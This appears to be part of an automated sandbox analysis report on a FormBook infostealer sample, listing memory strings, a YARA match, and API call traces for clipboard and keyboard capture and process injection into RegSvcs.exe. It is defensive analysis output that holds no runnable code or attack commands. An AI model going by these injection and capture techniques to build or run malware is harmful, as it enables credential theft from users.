                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp, tguujh.msc.exe, 00000010.00000002.1734578720.0000000000C95000.00000002.00000001.01000000.0000000D.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00CCF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00CCF6C7
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00C3F6C7
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00CCF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_00CBA54A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CE9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00CE9ED5
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C59ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00C59ED5

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042CCE3 NtClose,15_2_0042CCE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_00ED2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_00ED2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED35C0 NtCreateMutant,LdrInitializeThunk,15_2_00ED35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED4340 NtSetContextThread,15_2_00ED4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED4650 NtSuspendThread,15_2_00ED4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2AF0 NtWriteFile,15_2_00ED2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2AD0 NtReadFile,15_2_00ED2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2AB0 NtWaitForSingleObject,15_2_00ED2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2BE0 NtQueryValueKey,15_2_00ED2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2BF0 NtAllocateVirtualMemory,15_2_00ED2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2BA0 NtEnumerateValueKey,15_2_00ED2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2B80 NtQueryInformationFile,15_2_00ED2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2B60 NtClose,15_2_00ED2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2CF0 NtOpenProcess,15_2_00ED2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2CC0 NtQueryVirtualMemory,15_2_00ED2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2CA0 NtQueryInformationToken,15_2_00ED2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2C60 NtCreateKey,15_2_00ED2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2C00 NtQueryInformationProcess,15_2_00ED2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2DD0 NtDelayExecution,15_2_00ED2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2DB0 NtEnumerateKey,15_2_00ED2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2D30 NtUnmapViewOfSection,15_2_00ED2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2D00 NtSetInformationFile,15_2_00ED2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2D10 NtMapViewOfSection,15_2_00ED2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2EE0 NtQueueApcThread,15_2_00ED2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2EA0 NtAdjustPrivilegesToken,15_2_00ED2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2E80 NtReadVirtualMemory,15_2_00ED2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2E30 NtWriteVirtualMemory,15_2_00ED2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2FE0 NtCreateFile,15_2_00ED2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2FA0 NtQuerySection,15_2_00ED2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2FB0 NtResumeThread,15_2_00ED2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2F90 NtProtectVirtualMemory,15_2_00ED2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2F60 NtCreateProcessEx,15_2_00ED2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2F30 NtCreateSection,15_2_00ED2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED3090 NtSetValueKey,15_2_00ED3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED3010 NtOpenDirectoryObject,15_2_00ED3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED39B0 NtGetContextThread,15_2_00ED39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED3D70 NtOpenThread,15_2_00ED3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED3D10 NtOpenProcessToken,15_2_00ED3D10
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_00999B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00999B5C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00CB1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00CBF122
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00C2F122
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009A355D0_2_009A355D
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009AB76F0_2_009AB76F
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_0099BF3D0_2_0099BF3D
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009BC0D60_2_009BC0D6
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009AA0080_2_009AA008
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B92D00_2_009B92D0
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009A52140_2_009A5214
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009AA2220_2_009AA222
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009AC27F0_2_009AC27F
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009C43600_2_009C4360
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009C86D20_2_009C86D2
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009A46CF0_2_009A46CF
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009948AA0_2_009948AA
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009C480E0_2_009C480E
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_00995AFE0_2_00995AFE
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009AABC80_2_009AABC8
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_00997CBA0_2_00997CBA
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009ABC050_2_009ABC05
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_00993D9D0_2_00993D9D
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009A4D320_2_009A4D32
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009BBEA70_2_009BBEA7
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009A5F0B0_2_009A5F0B
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_00995F390_2_00995F39
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141307110_3_01413071
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141307810_3_01413078
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C7910_3_01459C79
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C7910_3_01459C79
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141452810_3_01414528
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145B13010_3_0145B130
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145B13010_3_0145B130
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145A4C010_3_0145A4C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145A4C010_3_0145A4C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014127E810_3_014127E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014593F010_3_014593F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014593F010_3_014593F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C8010_3_01459C80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C8010_3_01459C80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141408810_3_01414088
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141408A10_3_0141408A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9010_3_0145AC90
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9010_3_0145AC90
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9210_3_0145AC92
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9210_3_0145AC92
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014138B810_3_014138B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141307110_3_01413071
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141307810_3_01413078
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C7910_3_01459C79
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C7910_3_01459C79
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141452810_3_01414528
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145B13010_3_0145B130
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145B13010_3_0145B130
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145A4C010_3_0145A4C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145A4C010_3_0145A4C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014127E810_3_014127E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014593F010_3_014593F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014593F010_3_014593F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C8010_3_01459C80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C8010_3_01459C80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141408810_3_01414088
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141408A10_3_0141408A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9010_3_0145AC90
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9010_3_0145AC90
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9210_3_0145AC92
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9210_3_0145AC92
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014138B810_3_014138B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141307110_3_01413071
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141307810_3_01413078
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C7910_3_01459C79
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C7910_3_01459C79
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141452810_3_01414528
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145B13010_3_0145B130
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145B13010_3_0145B130
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145A4C010_3_0145A4C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145A4C010_3_0145A4C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014127E810_3_014127E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014593F010_3_014593F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014593F010_3_014593F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C8010_3_01459C80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_01459C8010_3_01459C80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141408810_3_01414088
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0141408A10_3_0141408A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9010_3_0145AC90
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9010_3_0145AC90
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9210_3_0145AC92
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_0145AC9210_3_0145AC92
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_3_014138B810_3_014138B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C6E0BE10_2_00C6E0BE
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C7200710_2_00C72007
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C7803710_2_00C78037
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C5E1A010_2_00C5E1A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C722C210_2_00C722C2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C8A28E10_2_00C8A28E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C5225D10_2_00C5225D
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C6C59E10_2_00C6C59E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CDC7A310_2_00CDC7A3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C8E89F10_2_00C8E89F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC291A10_2_00CC291A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C86AFB10_2_00C86AFB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB8B2710_2_00CB8B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C7CE3010_2_00C7CE30
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CE51D210_2_00CE51D2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C8716910_2_00C87169
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C5924010_2_00C59240
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C5949910_2_00C59499
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C7172410_2_00C71724
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C71A9610_2_00C71A96
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C77BAB10_2_00C77BAB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C59B6010_2_00C59B60
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C77DDA10_2_00C77DDA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C71D4010_2_00C71D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004031C015_2_004031C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042F2C315_2_0042F2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004103E315_2_004103E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040255015_2_00402550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402D2015_2_00402D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402D2215_2_00402D22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00416DEE15_2_00416DEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00416DF315_2_00416DF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0041060315_2_00410603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E60315_2_0040E603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E74715_2_0040E747
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E75315_2_0040E753
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E79C15_2_0040E79C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3200015_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F581CC15_2_00F581CC
